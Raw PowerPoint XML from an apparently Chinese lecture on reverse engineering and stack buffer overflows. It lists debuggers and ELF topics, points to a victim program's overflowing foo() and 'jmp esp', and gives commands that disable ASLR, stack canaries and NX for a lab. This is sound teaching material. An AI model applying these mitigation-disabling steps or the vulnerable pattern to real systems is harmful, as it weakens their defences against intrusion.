                <a:sym typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OllyDbg</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Soft ICE</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WinDbg</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>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7417" name="椭圆 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5812790" y="3144203"/>
            <a:ext cx="4032250" cy="1471612"/>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分析 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">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调试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17418" name="AutoShape 10"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="17412" idx="2"/>
            <a:endCxn id="17417" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipV="1">
            <a:off x="5396230" y="2352675"/>
            <a:ext cx="862965" cy="1151255"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 37528"/>
            </a:avLst>
          </a:prstGeom>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent3"/>
          </a:lnRef>
          <a:fillRef idx="2">
            <a:schemeClr val="accent3"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent3"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1137920" y="5045710"/>
            <a:ext cx="9521825" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 简单说就是：打开程序的外壳，观察其中的内容，实现自己的目的。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:sym typeface="+mn-ea"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1016635" y="1297305"/>
            <a:ext cx="10388600" cy="3784600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>逆向工程的两个阶段：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>系统级逆向</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对程序进行大范围的观察，确定程序的基本结构，找到感兴趣的代码区域。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>代码级逆向</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="2" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>从程序的二进制代码中提取设计理念和算法。由于编译器抹掉了很多便于理解的信息，即使有完整文档，也面临理解的困难。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2379163" y="1764698"/>
            <a:ext cx="3543917" cy="3946381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6367145" y="2405380"/>
            <a:ext cx="3415665" cy="1322070"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>明显foo()存在栈溢出漏洞。同时dummy()模仿大型的程序。在大型的程序中，jmp esp 这样的代码，很容易找到。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1339215" y="995045"/>
            <a:ext cx="8030845" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>创建一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语言</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>（源码如下）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="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337015"/>
            <a:ext cx="5258480" cy="682623"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>目录</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="灯片编号占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8610601" y="6356351"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{A74AA12F-CC77-4A44-80F4-8E0AE8590DDB}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="263" name="组合 262"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1498239" y="4658242"/>
            <a:ext cx="3459735" cy="579755"/>
            <a:chOff x="732773" y="2049662"/>
            <a:chExt cx="3459735" cy="579755"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Diamond 288"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="732773" y="2049662"/>
              <a:ext cx="605155" cy="57975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p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman Regular" panose="02020703060505090304" charset="0"/>
                  <a:cs typeface="Times New Roman Regular" panose="02020703060505090304" charset="0"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman Regular" panose="02020703060505090304" charset="0"/>
                <a:cs typeface="Times New Roman Regular" panose="02020703060505090304" charset="0"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="TextBox 298"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1220577" y="2184341"/>
              <a:ext cx="2971931" cy="182148"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="360000" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0"/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005DA2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman Regular" panose="02020703060505090304" charset="0"/>
                <a:cs typeface="Times New Roman Regular" panose="02020703060505090304" charset="0"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="262" name="组合 261"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1498239" y="3325575"/>
            <a:ext cx="3459735" cy="567055"/>
            <a:chOff x="732773" y="1403430"/>
            <a:chExt cx="3459735" cy="567055"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Diamond 290"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="732773" y="1403430"/>
              <a:ext cx="605155" cy="56705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p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman Regular" panose="02020703060505090304" charset="0"/>
                  <a:cs typeface="Times New Roman Regular" panose="02020703060505090304" charset="0"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman Regular" panose="02020703060505090304" charset="0"/>
                <a:cs typeface="Times New Roman Regular" panose="02020703060505090304" charset="0"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="TextBox 296"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1220577" y="1691779"/>
              <a:ext cx="2971931" cy="182148"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="360000" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0"/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman Regular" panose="02020703060505090304" charset="0"/>
                  <a:cs typeface="Times New Roman Regular" panose="02020703060505090304" charset="0"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>逆向分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman Regular" panose="02020703060505090304" charset="0"/>
                <a:cs typeface="Times New Roman Regular" panose="02020703060505090304" charset="0"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="261" name="组合 260"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1498241" y="1846223"/>
            <a:ext cx="3459733" cy="579120"/>
            <a:chOff x="732775" y="732433"/>
            <a:chExt cx="3459733" cy="579120"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Diamond 292"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="732775" y="732433"/>
              <a:ext cx="605155" cy="57912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p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman Regular" panose="02020703060505090304" charset="0"/>
                  <a:cs typeface="Times New Roman Regular" panose="02020703060505090304" charset="0"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman Regular" panose="02020703060505090304" charset="0"/>
                <a:cs typeface="Times New Roman Regular" panose="02020703060505090304" charset="0"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="TextBox 294"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1220577" y="1019512"/>
              <a:ext cx="2971931" cy="182148"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="360000" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0"/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="100000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman Regular" panose="02020703060505090304" charset="0"/>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>ELF</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="100000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman Regular" panose="02020703060505090304" charset="0"/>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>文件介绍</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="100000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman Regular" panose="02020703060505090304" charset="0"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 294"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1986043" y="4974927"/>
            <a:ext cx="2971931" cy="182148"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="360000" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0"/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="100000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman Regular" panose="02020703060505090304" charset="0"/>
                <a:cs typeface="Times New Roman Regular" panose="02020703060505090304" charset="0"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>总结</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="100000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Times New Roman Regular" panose="02020703060505090304" charset="0"/>
              <a:cs typeface="Times New Roman Regular" panose="0202070306050509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sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885825" y="1176020"/>
            <a:ext cx="10741025" cy="4523105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>实验前准备：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>关闭：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ASLR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（系统级）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   命令：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sudo sysctl kernel.randomize_va_space=0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>禁用：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>canary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NX</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>命令：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>victim.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> -o victim -g -m32 -no-pie -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>masm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>=intel -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-stack-protector -z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>execstack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>实验原理：通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
